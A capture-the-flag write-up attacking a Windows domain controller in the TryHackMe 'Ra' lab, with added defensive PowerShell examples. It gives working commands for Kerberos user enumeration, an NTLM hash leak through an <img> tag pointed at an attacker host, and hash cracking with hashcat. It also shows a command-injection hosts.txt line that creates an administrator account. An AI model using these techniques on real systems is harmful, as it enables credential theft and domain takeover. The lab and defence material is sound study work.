- URL: https://tryhackme.com/room/ra
- Target OS: Windows
- Rated Difficulty: Hard
DESCRIPTION
You have gained access to the internal network of WindCorp, the multibillion dollar company, running an extensive social media campaign claiming to be unhackable (ha! so much for that claim!).
Next step would be to take their crown jewels and get full access to their internal network. You have spotted a new windows machine that may lead you to your end goal. Can you conquer this end boss and own their internal network?
ENUM >> NMAP
# Nmap 7.92 scan initiated Mon Feb 7 21:34:49 2022 as: nmap -sT -A -p 53,80,88,135,139,389,445,464,593,636,2179,3268,3269,3389,5222,5269,7070,7443,7777,9090,9091 -oN nmap_agressive 10.10.222.51
Nmap scan report for 10.10.222.51
Host is up (0.35s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Windcorp.
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-02-07 10:35:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Not valid before: 2022-02-06T10:28:31
|_Not valid after: 2022-08-08T10:28:31
|_ssl-date: 2022-02-07T10:37:40+00:00; +47s from scanner time.
| rdp-ntlm-info:
| Target_Name: WINDCORP
| NetBIOS_Domain_Name: WINDCORP
| NetBIOS_Computer_Name: FIRE
| DNS_Domain_Name: windcorp.thm
| DNS_Computer_Name: Fire.windcorp.thm
| DNS_Tree_Name: windcorp.thm
| Product_Version: 10.0.17763
|_ System_Time: 2022-02-07T10:37:02+00:00
5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| errors:
| invalid-namespace
| (timeout)
| unknown:
| compression_methods:
| xmpp:
| version: 1.0
| features:
| stream_id: alldcg4s1r
| auth_mechanisms:
|_ capabilities:
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
|_ssl-date: 2022-02-07T10:37:41+00:00; +47s from scanner time.
5269/tcp open xmpp Wildfire XMPP Client
| xmpp-info:
| STARTTLS Failed
| info:
| errors:
| (timeout)
| unknown:
| compression_methods:
| xmpp:
| features:
| auth_mechanisms:
|_ capabilities:
7070/tcp open http Jetty 9.4.18.v20190429
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
7443/tcp open ssl/http Jetty 9.4.18.v20190429
|_http-title: Openfire HTTP Binding Service
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
7777/tcp open socks5 (No authentication; connection not allowed by ruleset)
| socks-auth-info:
|_ No authentication
9090/tcp open zeus-admin?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 07 Feb 2022 10:35:44 GMT
| Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 07 Feb 2022 10:35:55 GMT
| Allow: GET,HEAD,POST,OPTIONS
| JavaRMI, drda, ibm-db2-das, informix:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| SqueezeCenter_CLI:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| WMSRequest:
| HTTP/1.1 400 Illegal character CNTL=0x1
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp open ssl/xmltec-xmlmail?
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 07 Feb 2022 10:36:10 GMT
| Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 07 Feb 2022 10:36:12 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 400 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
Network Distance: 2 hops
Service Info: Host: FIRE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 46s, deviation: 0s, median: 46s
| smb2-time:
| date: 2022-02-07T10:37:06
|_ start_date: N/A
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 361.67 ms 10.9.0.1
2 361.81 ms 10.10.222.51
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 7 21:37:11 2022 -- 1 IP address (1 host up) scanned in 142.20 seconds
- Seeing as we are dealing with a Windows domain controller (open port 88) it would be wise to add fire.windcorp.thm and windcorp.thm to local /etc/hosts
ENUM >> Userlist found in website HTML code…
- The website has a list of their "IT support-staff", and they are all XMPP links…
organicfish718
organicwolf509
tinywolf424
angrybird253
buse
Edeltraut
Edward
Emile
tinygoose102
brownostrich284
sadswan869
goldencat416
whiteleopard529
happymeercat399
orangegorilla428
ENUM >> Kerbrute against harvested userlist
❯ ./kerbrute userenum --dc windcorp.thm -d windcorp.thm userlist
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 02/08/22 - Ronnie Flathers @ropnop
2022/02/08 01:45:11 > Using KDC(s):
2022/02/08 01:45:11 > windcorp.thm:88
2022/02/08 01:45:11 > [+] VALID USERNAME: tinygoose102@windcorp.thm
2022/02/08 01:45:11 > [+] VALID USERNAME: brownostrich284@windcorp.thm
2022/02/08 01:45:11 > [+] VALID USERNAME: Edward@windcorp.thm
2022/02/08 01:45:11 > [+] VALID USERNAME: Edeltraut@windcorp.thm
2022/02/08 01:45:11 > [+] VALID USERNAME: organicfish718@windcorp.thm
2022/02/08 01:45:11 > [+] VALID USERNAME: Emile@windcorp.thm
2022/02/08 01:45:11 > [+] VALID USERNAME: angrybird253@windcorp.thm
2022/02/08 01:45:11 > [+] VALID USERNAME: buse@windcorp.thm
2022/02/08 01:45:12 > [+] VALID USERNAME: goldencat416@windcorp.thm
2022/02/08 01:45:12 > [+] VALID USERNAME: happymeercat399@windcorp.thm
2022/02/08 01:45:12 > [+] VALID USERNAME: orangegorilla428@windcorp.thm
2022/02/08 01:45:12 > [+] VALID USERNAME: whiteleopard529@windcorp.thm
2022/02/08 01:45:12 > [+] VALID USERNAME: sadswan869@windcorp.thm
2022/02/08 01:45:12 > Done! Tested 15 usernames (13 valid) in 0.758 seconds
- These usernames are all well and good… but without any passwords they don’t hold much value… we need a different way in!
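From the defender's side, the kerbrute run above is visible on the domain controller: each probe is a TGT request, which the DC records as Security event 4768, and a name that does not exist fails with result code 0x6 ("client not found in Kerberos database"). The following is an added example, not part of this writeup or of kerbrute, that groups those failures by source address and flags a client that has asked about many distinct unknown names in a short window. It assumes "Audit Kerberos Authentication Service" is enabled for failures on the DC, that it is run on the DC itself (or pointed at it with -ComputerName on Get-WinEvent), and that the 4768 event data fields are named Status, IpAddress and TargetUserName as in Microsoft's event documentation.

```powershell
# Added example (not from the writeup): spot Kerberos username enumeration from 4768 failures.
# Assumes failure auditing for "Kerberos Authentication Service" is on and that the Security
# log being read is the domain controller's.

function Get-KerberosEnumSuspects {
    param(
        [int]$Threshold = 10,        # distinct unknown names from one address before we alert
        [int]$LookbackMinutes = 60,
        [int]$MaxEvents = 20000
    )
    $since  = (Get-Date).AddMinutes(-$LookbackMinutes)
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4768; StartTime = $since } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue

    # Keep only requests the KDC rejected because the principal does not exist (Status 0x6).
    $failures = foreach ($e in $events) {
        [xml]$x = $e.ToXml()
        $d = @{}
        foreach ($item in $x.Event.EventData.Data) { $d[$item.Name] = $item.'#text' }
        if ($d['Status'] -eq '0x6') {
            [pscustomobject]@{
                Time   = $e.TimeCreated
                Source = $d['IpAddress'] -replace '^::ffff:', ''   # strip the IPv4-mapped prefix
                User   = $d['TargetUserName']
            }
        }
    }

    # One address asking about many different non-existent names is the enumeration signature.
    $failures | Group-Object Source | ForEach-Object {
        $names = @($_.Group.User | Sort-Object -Unique)
        if ($names.Count -ge $Threshold) {
            $times = @($_.Group.Time | Sort-Object)
            [pscustomobject]@{
                Source       = $_.Name
                UnknownNames = $names.Count
                FirstSeen    = $times[0]
                LastSeen     = $times[-1]
                Sample       = ($names | Select-Object -First 5) -join ', '
            }
        }
    }
}

Get-KerberosEnumSuspects | Format-Table -AutoSize
```

The threshold is deliberately low: a legitimate client mistyping a name produces one or two 0x6 failures, while a wordlist run like the one above produces a burst of distinct names from one address within a second or two.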
ENUM >> Some more users!
Turning back to the website, I decided to try and find something we could use to take advantage of the only other interactable item on the front page… the Reset Password button at the top right.
Upon closer inspection of the "Employees in focus" area it became obvious that "Lily Levesque" had a favourite pet… the dog in her picture! But what about the dog’s name? The name of the image in the source code gives us a big clue!
Ok, that’s all great… but none of our confirmed accounts match her name! Can we guess Lily’s?
Looking at the naming of the other 2 employees listed in this section, we can see a pattern… they seem to be first name followed by the first 2 letters of their surname. Just in case, though, we will throw their first name only in as a candidate:
Re-running Kerbrute on the updated list yields us two new results…
2022/02/08 13:28:39 > [+] VALID USERNAME: Kirkug@windcorp.thm
2022/02/08 13:28:39 > [+] VALID USERNAME: Lilyle@windcorp.thm
Hello there Lilyle! 😉
PRIVESC >> reset lilyle’s password
- OK, now that we have both Lilyle’s username and her dog’s name, let’s give them a shot!:
- Success! We now have Lilyle’s password!
ENUM >> SMBMap
- Let’s see if we get any SMB access from Lilyle’s credentials:
❯ smbmap -H 10.10.173.233 -u lilyle -p ChangeMe#1234
[+] IP: 10.10.173.233:445 Name: fire.windcorp.thm
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
Shared READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
LOOT >> "Flag 1.txt"
❯ smbclient -U lilyle \\\\10.10.173.233\\Shared
Enter WORKGROUP\lilyle's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat May 30 10:45:42 2020
.. D 0 Sat May 30 10:45:42 2020
Flag 1.txt A 45 Sat May 2 01:32:36 2020
spark_2_8_3.deb A 29526628 Sat May 30 10:45:01 2020
spark_2_8_3.dmg A 99555201 Sun May 3 21:06:58 2020
spark_2_8_3.exe A 78765568 Sun May 3 21:05:56 2020
spark_2_8_3.tar.gz A 123216290 Sun May 3 21:07:24 2020
15587583 blocks of size 4096. 10905638 blocks available
smb: \> get "Flag 1.txt"
getting file \Flag 1.txt of size 45 as Flag 1.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> exit
❯ cat Flag\ 1.txt
FLAG - Flag 1.txt
ENUM >> Spark 2.8.3
Spark is an XMPP client, linked on the main website at http://fire.windcorp.thm directly below the list of "IT support-staff". On top of this, binaries exist in the public SMB share that LilyLe can see… this has to be a big hint!
So after installing the latest version of Spark (at the time 2.9.4) on my local machine and getting nowhere, I decided to try my hand at the "suggested" version 2.8.3… First things first, after a quick Google search I discovered the following CVE:
https://www.cvedetails.com/cve/CVE-2020-12772/
This pointed to the following reference: https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md
- Quoted in the README.md on GitHub:
When we opened a chat with another user, we could send an <img tag to that user with an external URL as the source of that image, like this: <img src=[external_ip]/test.img>
Each time the user clicks the link, or the ROAR module automatically preloads it, the external server receives the request for the image, together with the NTLM hashes from the user that visits the link, i.e. the user you are chatting with!
- … and also:
By running responder, we could capture the hashes and use them to gain access to the user account and escalate our privileges (depending on the user of course).
Sounds like a plan! 🙂
- Oh, and did I forget to mention that theart42, who discovered this CVE, was also one of the creators of this room – and they specifically reference creating a CTF with this exact vulnerability? 😉 (probably helps too that all the example images on the GitHub repo were taken directly from this CTF too)
- Firstly, go into the Advanced menu at the bottom of the window, and ensure that the 2 highlighted options are ticked:
- With LilyLe’s username and password filled out, and the Domain set to windcorp.thm, we can then hit the Login button:
- Boot up responder (e.g. responder -I tun0) then go to Actions -> Start a chat and enter buse as our address (buse always seems to be online):
- Send a message with <img src="http://<ATTACK_IP>/picture.jpg"> to Buse, then watch for the response in Responder:
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.173.233
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash : <REDACTED>
CREDS - buse NetNTLMv2 hash
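What makes the CVE-2020-12772 leak above work is not the chat client alone: the Windows host also has to be willing to answer an NTLM challenge from an arbitrary external web server. The control for that is the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers", stored as the RestrictSendingNTLMTraffic value under the LSA MSV1_0 key, with ClientAllowedNTLMServers holding any exceptions. The following is an added example, not from this writeup or from the CVE author, that reports how a host is configured and, when the policy is in audit or deny mode, summarises which target servers clients have been sending NTLM to from the Microsoft-Windows-NTLM/Operational log. The registry value names and meanings are Microsoft's; the event ID (8001) and the assumption that its first data property is the target server name should be verified against a sample event on your own build before relying on the summary.

```powershell
# Added example (not from the writeup): audit the outgoing-NTLM restriction that decides
# whether an <img src="http://external/..."> in a chat can harvest a NetNTLMv2 response.

$LsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'

function Get-OutgoingNtlmPolicy {
    # Returns the policy state, the exception list and a simple hardened/not-hardened verdict.
    $props = Get-ItemProperty -Path $LsaKey -ErrorAction SilentlyContinue
    $value = $props.RestrictSendingNTLMTraffic
    if ($null -eq $value) {
        $state = 'Not configured (outgoing NTLM allowed)'
    } else {
        $state = switch ([int]$value) {
            0       { 'Allow all' }
            1       { 'Audit all' }
            2       { 'Deny all' }
            default { "Unknown value $value" }
        }
    }
    [pscustomobject]@{
        Value      = $value
        State      = $state
        Exceptions = @($props.ClientAllowedNTLMServers)   # servers exempt from the restriction
        Hardened   = ($value -eq 2)
    }
}

function Get-OutgoingNtlmTargets {
    # In audit or deny mode Windows logs each outgoing NTLM attempt to the NTLM operational
    # log. Grouping by target shows which servers users' clients have tried to authenticate
    # to; an Internet host in that list is the symptom of the leak described above.
    # Assumption: event 8001 is the client-side audit record and its first property is the
    # target server name.
    param([int]$MaxEvents = 500)
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-NTLM/Operational'; Id = 8001 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
    $events |
        ForEach-Object { $_.Properties[0].Value } |
        Group-Object |
        Sort-Object Count -Descending |
        Select-Object Count, @{ Name = 'TargetServer'; Expression = { $_.Name } }
}

Get-OutgoingNtlmPolicy
Get-OutgoingNtlmTargets | Format-Table -AutoSize
```

Setting the policy to "Deny all" with an exception list of the internal servers that genuinely need NTLM is the mitigation; "Audit all" is the safe first step, because the target list it produces tells you what would break before anything is blocked.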
LOOT >> cracking buse’s NTLMv2 hash
❯ hashcat -m 5600 buse.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz, 5121/5185 MB (2048 MB allocatable), 4MCU
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
<REDACTED>:<REDACTED>
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: BUSE::WINDCORP:6da1ec088e2f0ad5:c28f54dab3f6b4c463f...000000
Time.Started.....: Tue Feb 8 16:55:04 2022 (4 secs)
Time.Estimated...: Tue Feb 8 16:55:08 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 951.0 kH/s (3.53ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2961408/14344385 (20.65%)
Rejected.........: 0/2961408 (0.00%)
Restore.Point....: 2957312/14344385 (20.62%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: v10014318 -> utrox11
Started: Tue Feb 8 16:54:41 2022
Stopped: Tue Feb 8 16:55:09 2022
CREDS - buse
PRIVESC >> Evil-WinRM shell with buse!
❯ evil-winrm -i 10.10.180.148 -u buse -p <REDACTED>
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\buse\Documents> ls
*Evil-WinRM* PS C:\Users\buse\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\buse\Desktop> ls
Directory: C:\Users\buse\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/7/2020 3:00 AM Also stuff
d----- 5/7/2020 2:58 AM Stuff
-a---- 5/2/2020 11:53 AM 45 Flag 2.txt
-a---- 5/1/2020 8:33 AM 37 Notes.txt
*Evil-WinRM* PS C:\Users\buse\Desktop>
LOOT >> "Flag 2.txt"
*Evil-WinRM* PS C:\Users\buse\Desktop> cat "Flag 2.txt"
<REDACTED>
FLAG - Flag 2.txt
LOOT >> checkservers.ps1 in C:\scripts
# reset the lists of hosts prior to looping
$OutageHosts = $Null
# specify the time you want email notifications resent for hosts that are down
$EmailTimeOut = 30
# specify the time you want to cycle through your host lists.
$SleepTimeOut = 45
# specify the maximum hosts that can be down before the script is aborted
$MaxOutageCount = 10
# specify who gets notified
$notificationto = "brittanycr@windcorp.thm"
# specify where the notifications come from
$notificationfrom = "admin@windcorp.thm"
# specify the SMTP server
$smtpserver = "relay.windcorp.thm"
# start looping here
Do{
    $available = $Null
    $notavailable = $Null
    Write-Host (Get-Date)
    # Read the File with the Hosts every cycle, this way to can add/remove hosts
    # from the list without touching the script/scheduled task,
    # also hash/comment (#) out any hosts that are going for maintenance or are down.
    get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |
    ForEach-Object {
        $p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
        Invoke-Expression $p
        if($p)
        {
            # if the Host is available then just write it to the screen
            write-host "Available host ---> "$_ -BackgroundColor Green -ForegroundColor White
            [Array]$available += $_
        }
        else
        {
            # If the host is unavailable, give a warning to screen
            write-host "Unavailable host ------------> "$_ -BackgroundColor Magenta -ForegroundColor White
            $p = Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue
            if(!($p))
            {
                # If the host is still unavailable for 4 full pings, write error and send email
                write-host "Unavailable host ------------> "$_ -BackgroundColor Red -ForegroundColor White
                [Array]$notavailable += $_
                if ($OutageHosts -ne $Null)
                {
                    if (!$OutageHosts.ContainsKey($_))
                    {
                        # First time down add to the list and send email
                        Write-Host "$_ Is not in the OutageHosts list, first time down"
                        $OutageHosts.Add($_,(get-date))
                        $Now = Get-date
                        $Body = "$_ has not responded for 5 pings at $Now"
                        Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
                        -Subject "Host $_ is down" -SmtpServer $smtpserver
                    }
                    else
                    {
                        # If the host is in the list do nothing for 1 hour and then remove from the list.
                        Write-Host "$_ Is in the OutageHosts list"
                        if (((Get-Date) - $OutageHosts.Item($_)).TotalMinutes -gt $EmailTimeOut)
                        {$OutageHosts.Remove($_)}
                    }
                }
                else
                {
                    # First time down create the list and send email
                    Write-Host "Adding $_ to OutageHosts."
                    $OutageHosts = @{$_=(get-date)}
                    $Body = "$_ has not responded for 5 pings at $Now"
                    Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
                    -Subject "Host $_ is down" -SmtpServer $smtpserver
                }
            }
        }
    }
    # Report to screen the details
    $log = "Last run: $(Get-Date)"
    write-host $log
    Set-Content -Path C:\scripts\log.txt -Value $log
    Write-Host "Available count:"$available.count
    Write-Host "Not available count:"$notavailable.count
    Write-Host "Not available hosts:"
    $OutageHosts
    Write-Host ""
    Write-Host "Sleeping $SleepTimeOut seconds"
    sleep $SleepTimeOut
    if ($OutageHosts.Count -gt $MaxOutageCount)
    {
        # If there are more than a certain number of host down in an hour abort the script.
        $Exit = $True
        $body = $OutageHosts | Out-String
        Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
        -Subject "More than $MaxOutageCount Hosts down, monitoring aborted" -SmtpServer $smtpServer
    }
}
while ($Exit -ne $True)
PRIVESC >> using checkservers.ps1 to gain Administrator
OK, so the PowerShell loot above seems like a massive chunk of script to take in… and you’d be right! The basic idea is that it uses Test-Connection to make connections to outside websites like google.com to see if the server has connectivity to the outside; if not, it reports it.
However, there is one important bit that we care about at the very start of the code (after the variables):
get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |
ForEach-Object {
    $p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
    Invoke-Expression $p
Basically that script is grabbing any line of C:\Users\brittanycr\hosts.txt that is not a comment (e.g. a line that starts with #) and passing it to Test-Connection via Invoke-Expression…
We can also tell by watching log.txt that this script is called every minute…
*Evil-WinRM* PS C:\Scripts> cat log.txt
Last run: 02/08/2022 20:06:26
*Evil-WinRM* PS C:\Scripts> cat log.txt
Last run: 02/08/2022 20:07:11
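The flaw in checkservers.ps1 is a chain of three things: the script builds a command string from file contents and hands it to Invoke-Expression, it reads that file from a user's profile directory, and it runs on a schedule under a highly privileged account. The following is an added example, not the room's script, showing how the polling loop looks once those are fixed: the host name is passed to Test-Connection as a parameter value (so it can only ever be a string), every entry is validated against a strict hostname pattern, and the file is refused outright if any non-administrative principal can write to it. It assumes the same hosts.txt format (one host per line, # starts a comment) and that the file lives at C:\scripts\hosts.txt, owned by Administrators, which is a placeholder location chosen for the example.

```powershell
# Added example (not the room's checkservers.ps1): hardened host-polling loop.
# Assumes hosts.txt is kept under C:\scripts (not a user profile) and owned by Administrators.

$HostsPath   = 'C:\scripts\hosts.txt'   # assumed location
# Letters, digits, hyphens and dots only (DNS labels or dotted IPv4): nothing PowerShell could
# read as a command separator, redirection or variable.
$HostPattern = '^(?=.{1,253}$)([A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$'
# Rights that let a principal change or replace the file: write bits, Delete/WriteDAC/WriteOwner,
# and the generic write/all bits that inherited ACEs sometimes carry.
$WriteMask   = 0x116 -bor 0xD0000 -bor 0x40000000 -bor 0x10000000

function Test-HostsFileTrusted {
    # True only if the file is owned by a trusted principal and nobody else can modify it.
    param([Parameter(Mandatory)][string]$Path)
    $trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')
    $acl = Get-Acl -LiteralPath $Path
    if ($trusted -notcontains $acl.Owner) { return $false }
    $writers = @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        (([int]$_.FileSystemRights) -band $WriteMask) -ne 0 -and
        ($trusted -notcontains $_.IdentityReference.Value)
    })
    return ($writers.Count -eq 0)
}

function Get-MonitoredHosts {
    # Reads the file as data only: strips comments, trims, keeps well-formed names.
    param([Parameter(Mandatory)][string]$Path)
    Get-Content -LiteralPath $Path |
        ForEach-Object { ($_ -split '#', 2)[0].Trim() } |
        Where-Object { $_ -ne '' } |
        ForEach-Object {
            if ($_ -match $HostPattern) { $_ }
            else { Write-Warning "Skipping malformed host entry: '$_'" }
        }
}

function Test-MonitoredHost {
    # The name is bound to -ComputerName as a value; no string is ever evaluated as code.
    param([Parameter(Mandatory)][string]$ComputerName)
    [bool](Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction SilentlyContinue)
}

if (-not (Test-HostsFileTrusted -Path $HostsPath)) {
    Write-Error "Refusing to read $HostsPath because a non-administrative account can modify it."
    exit 1
}

$available = @(); $notavailable = @()
foreach ($h in Get-MonitoredHosts -Path $HostsPath) {
    if (Test-MonitoredHost -ComputerName $h) { $available += $h } else { $notavailable += $h }
}
Write-Host "Available: $($available -join ', ')"
Write-Host "Not available: $($notavailable -join ', ')"
```

With this version a line such as the ;net user … payload used later in this writeup is simply rejected as a malformed host name, and the script never gets that far if the file's ACL has been loosened. The ACL check is the part that matters most for a scheduled task: even a perfectly written script is only as trustworthy as the inputs its run-as account reads.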
So, with a carefully crafted hosts.txt, checkservers.ps1 might lead us to SYSTEM…
- But we need access to brittanycr’s home directory to write it…
*Evil-WinRM* PS C:\scripts> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================ ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
WINDCORP\IT Group S-1-5-21-555431066-3599073733-176599750-5865 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
- Because we are a part of the Account Operators group, we do have limited access to modify standard users’ accounts… most importantly – changing their password!
*Evil-WinRM* PS C:\scripts> net user brittanycr hax0r3d! /domain
The command completed successfully.
- Now we simply create a new hosts.txt file with the following contents:
;net user stimpz0r r00t3d! /add;net localgroup Administrators stimpz0r /add
- Connect to SMB via brittanycr’s account and upload the modified hosts.txt:
❯ smbclient -U brittanycr \\\\10.10.135.16\\Users
Enter WORKGROUP\brittanycr's password:
Try "help" to get a list of possible commands.
smb: \> cd brittanycr
smb: \brittanycr\> put hosts.txt
putting file hosts.txt as \brittanycr\hosts.txt (0.1 kb/s) (average 0.1 kb/s)
smb: \brittanycr\>
- Then sit back and watch! 😉
*Evil-WinRM* PS C:\scripts> cat log.txt
Last run: 02/08/2022 19:23:11
*Evil-WinRM* PS C:\scripts> Get-LocalUser "stimpz0r"
User stimpz0r was not found.
At line:1 char:1
+ Get-LocalUser "stimpz0r"
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (stimpz0r:String) [Get-LocalUser], UserNotFoundException
+ FullyQualifiedErrorId : UserNotFound,Microsoft.PowerShell.Commands.GetLocalUserCommand
